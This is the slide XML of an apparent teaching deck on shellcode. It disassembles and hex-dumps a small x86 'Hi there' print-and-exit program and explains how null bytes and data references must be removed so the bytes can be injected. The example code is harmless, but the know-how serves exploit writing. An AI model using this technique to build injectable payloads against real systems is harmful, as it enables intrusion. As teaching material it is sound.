                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x80490a4,%ecx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 804808f:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>09 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x9,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>8048094:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>0x80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 // exit()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>8048096:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>01 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>$0x1,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 804809b:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>00 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>$0x0,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> 80480a0:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2365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592" y="1268413"/>
            <a:ext cx="8568952" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>08048080 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;: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// print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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 8048080:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x4,%eax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 8048085:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01 00 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x1,%ebx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 804808a:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a4 90 04 08     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x80490a4,%ecx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 804808f:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ba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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>09 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x9,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8048094:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80</a:t>
            </a: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 // exit()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8048096:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x1,%eax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 804809b:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x0,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 80480a0:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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1576" y="1268413"/>
            <a:ext cx="10137576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hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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–C print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1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00000000  </a:t>
            </a:r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7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|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00000010  02 00 03 00 01 00 00 00  80 80 04 08 34 00 00 00  |............4...|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00000020  94 01 00 00 00 00 00 00  34 00 20 00 02 00 28 00  |........4. ...(.|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00000030  06 00 03 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|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00000040  00 80 04 08 a2 00 00 00  a2 00 00 00 05 00 00 00  |................|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00000050  00 10 00 00 01 00 00 00  a4 00 00 00 a4 90 04 08  |................|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00000060  a4 90 04 08 09 00 00 00  09 00 00 00 06 00 00 00  |................|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00000070  00 10 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|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00000080  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="17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b8 04 00 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF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de-CH" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8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01 00  00 00 </a:t>
            </a:r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b9 a4 90 04 08 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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 |................|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00000090  09 00 00 00 cd 80 b8 01  00 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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00 00 00 00  |................|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000000a0  cd 80 00 00 48 69 20 74  68 65 72 65 0a 00 2e 73  |....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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</a:t>
            </a:r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...s|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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000000b0  79 6d 74 61 62 00 2e 73  74 72 74 61 62 00 2e 73  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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ymtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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de-CH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s…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4287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1268760"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compile/Assembler:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The process of converting source code into a series of instructions/bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembler -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disassemble:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The process of converting a series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions/bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> into the equivalent assembler source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bytes -&gt; Assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decompile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The process of converting instructions/assembler into the original source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembler -&gt; C/C++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20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80592" y="831095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0592" y="4647519"/>
            <a:ext cx="2808312" cy="1224136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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80592" y="1047119"/>
            <a:ext cx="2808312" cy="941721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575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80592" y="2733917"/>
            <a:ext cx="2808312" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd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70991"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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4928" y="4630512"/>
            <a:ext cx="590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8048080:  b8 04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$0x4,%eax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8048085:  bb 01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$0x1,%ebx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804808a:  b9 a4 90 04 08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$0x80490a4,%ecx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804808f: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09 00 00 00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$0x9,%edx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8048094:  cd 80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0x80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04928" y="4647519"/>
            <a:ext cx="5601072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7751" y="2800399"/>
            <a:ext cx="3523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0991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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8621" y="1510815"/>
            <a:ext cx="221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0x80490a4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304928" y="2754018"/>
            <a:ext cx="3456384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endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7591604" y="3547323"/>
            <a:ext cx="1879739" cy="1339999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17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7523836" y="2433228"/>
            <a:ext cx="1181863" cy="506587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4088904" y="2754018"/>
            <a:ext cx="216024" cy="242934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4088904" y="3140968"/>
            <a:ext cx="216024" cy="905428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>
            <a:off x="4088904" y="4657865"/>
            <a:ext cx="216024" cy="499327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4088904" y="5445224"/>
            <a:ext cx="216024" cy="505019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1280592" y="2996952"/>
            <a:ext cx="2808312" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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the shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Null bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>References data section / Not position independent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5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shellcode formed?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Compiled assembler code produces bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These bytes can be executed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To have a functioning shellcode, some problems need to be fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data reference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47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Shellcode Fix: Null Bytes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74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Null Bytes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are null bytes a problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It’s a string delimiter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() etc. will stop copying if it encounters a 0 byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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9711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Null Bytes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to fix null bytes in shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Replace instructions with contain 0 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Note: This is more an art than a technique.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377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Shellcode! Example in one slide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1" y="908719"/>
            <a:ext cx="6840761" cy="34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99" y="4509120"/>
            <a:ext cx="827797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4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Null Bytes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592" y="1268413"/>
            <a:ext cx="8568952" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // print</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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8048080:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x4,%eax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8048085:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r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01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x1,%ebx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804808a:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a4 90 04 08     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x80490a4,%ecx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804808f:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r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09 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
